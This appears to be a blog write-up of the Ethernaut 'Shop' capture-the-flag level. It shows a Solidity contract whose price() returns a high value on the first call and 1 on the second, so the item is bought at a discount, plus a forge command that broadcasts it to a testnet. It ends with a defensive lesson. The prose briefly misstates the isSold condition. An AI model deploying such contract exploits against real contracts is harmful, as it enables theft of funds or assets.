Read the article directly on my blog: Ethernaut Solutions | Level 21 - Shop
The goal of the Shop challenge is to buy an item from the contract at a discount. How to do that? Let's check the buy()
function:
function buy() public {
Buyer _buyer = Buyer(msg.sender);
if (_buyer.price() >= price && !isSold) {
isSold = true;
price = _buyer.price();
}
}
It seems that only a price equal to or greater than the current price will be accepted. However, the price()
function is not a simple getter, but rather an interface without any logic. So what if we could set our own logic?
This is quite similar to the level 11 - Elevator. We can create a new contract that implements the Buyer
interface and sets our custom logic for the price()
function.
Now, we simply have to mess with this part:
if (_buyer.price() >= price && !isSold) {
isSold = true;
price = _buyer.price();
}
Notice how the price()
is called twice. Once to check that the price paid is enough, then again to set the price to its new value.
So we want !sold
to be false and price
to be more than 100 the first time to pass the condition, and then !sold
to be true and price
to be as little as possible the second time. And there will be our discount.
Let's implement the code accordingly:
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
interface IShop {
function isSold() external view returns (bool);
function buy() external;
}
contract Discount {
IShop shop;
constructor(address _shop) {
shop = IShop(_shop);
}
function price() public view returns (uint256) {
return shop.isSold() ? 1 : 101;
}
function attack() public {
shop.buy();
}
}
Then run the script with the following command:
forge script script/21_Shop.s.sol:PoC --rpc-url sepolia --broadcast --watch
- Don't change the state based on external and untrusted contracts logic.